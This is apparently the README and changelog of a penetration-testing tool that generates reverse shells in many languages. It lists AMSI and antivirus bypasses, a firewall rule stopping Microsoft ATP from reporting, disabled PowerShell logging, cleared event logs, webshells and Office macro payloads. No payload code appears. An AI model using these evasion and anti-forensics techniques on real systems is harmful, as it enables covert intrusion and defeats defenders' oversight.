A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formatted.
- Shows username@computer.(domain), above the prompt and working-directory
- Has a partial AMSI-bypass making some stuff a bit easier, like loading a full AMSI bypass.
- TCP, UDP and SSL shells
- New custom TCP revshell!
- New custom SSL revshell!
- Reflective loading theart42's amazing Sharpcat!
- Windows Powershell and Core Powershell
- Functions for uploading and downloading files. (Using Updog by sc0tfree)
- ngrok can be started/stopped from inside the script
- payloads will be genereated with the ngrok addresses
- you can start/stop Updog from inside the script
- The PowerShell revshells have upload/download function embedded
- To upload from nix using curl:
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
To install Shellz
git clone https://github.com/4ndr34z/shells
netcat, rlwrap, jq, basenc (coreutils)
updog, ngrok, xclip
- Listener started in new window. (Optional on Linux)
- Powershell: Added option for reflective loading Sharpcat
- PowerShell: New custom SSL shell
- PowerShell: Added options for choosing TCP/UDP/SSL
- PowerShell/OpenSSL: Defaulting to correct listener when using SSL
- Updated installer to use wrapper-script (remember to delete /usr/local/bin/shells when upgrading from < 1.5.8)
- PowerShell: Buildt a unique TCP revshell, that is not using Net.Sockets.TCPClient
- PowerShell: Remote errormessages now being properly displayed
- PHP: added options and more payloads
- Added option on other payloads for changing shell
- Powershell: Fixed the NIX payload
- Powershell: Updated the payload for reflective loading C#
- Powershell: Added options for payload in menu.
- PowerShell: Changed revshell for bypassing more AV vendors
- Powershell: Added firewall-rule, preventing MS ATP from phoning home (if the running user has access)
- Powershell: Updated VBA (MS Office Macros)
- PowerShell: Disabling scriptblock logging and CheckSuspiciousContent
- PowerShell: Clears PowerShell eventlogs (if the running user has access)
- PowerShell: Added VBA payloads for MS Office Macros
- Added some node.js payloads
- Added a simple C# shell.
- Added payload for reflective loading the C# shell into memory. (Needs full AMSI bypass)
- Covering this by adding Rastamouse's full AMSI Bypass
- PowerShell: You can automatically upload and run full AMSI bypass. The partitial AMSI bypass makes this possible.
- C# Shell: Automatically upload and run full AMSI bypass before loading it into memory
- Updog and ngrok status showing in every menu
- Sometimes less is more. Removed the obfuscating on TCP/UDP PowerShell revshells, because it actually triggers AV more than it bypasses and the payload got really big :-) Still using randomization.
- Added webshells (ASPX, PHP, JSP)
- Added 2 c++ revshell binaries for Windows 32 and 64 bit.
- Fixed the handling of starting/stopping Updog
- Added Updog support
- Added Netcat binaries.
- Powershell: Created upload/download functionality (upload requires Updog for receiving files)
- Added more information about running ngrok and Updog.
- PowerShell: Added a new "mini AMSI-bypass". (It is a partial bypass) Based on Matt Graebers Reflection method
- PowerShell: Added a "upload" function in the Powershell reverseshell
- Removed AMSI. Not tested enough :-)
- Added AMSI-bypass for the powershell payloads
- Fixed bug when setting port
- Changed default port to 443
- PowerShell: obfuscated some more
- PowerShell: Minor changes to the UDP payload
- Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
- PowerShell: Added UDP payloads
- PowerShell: Added more payloads
- PowerShell: Added some randomization and obfuscation for the payload
- PowerShell: Using UTF8 encoding in payload
- Fixed bug in Python revshell
- Added awk
- Added Bash UDP
- Added Windows Python revshells
- Added a ngrok running-status
- Hiding ngrok choice if not installed
- Fixed the install options: not doing default option when pressing enter without making a choice
- Added a install-script
- Added install options for checking and installing missing dependencies
- Added a couple of PHP shells
- Added shells for: Ruby, Perl, Telnet and zsh
- Added copy to clipboard using pbcopy on macOS
- Added info about listening netcat as the macOS versions doesn't display that
- Added looping netcat shells. Calls back every 10 seconds. Great in case you loose your shell
- Added check for netcat GNU netcat 0.7.0 Homebrew when running on macOS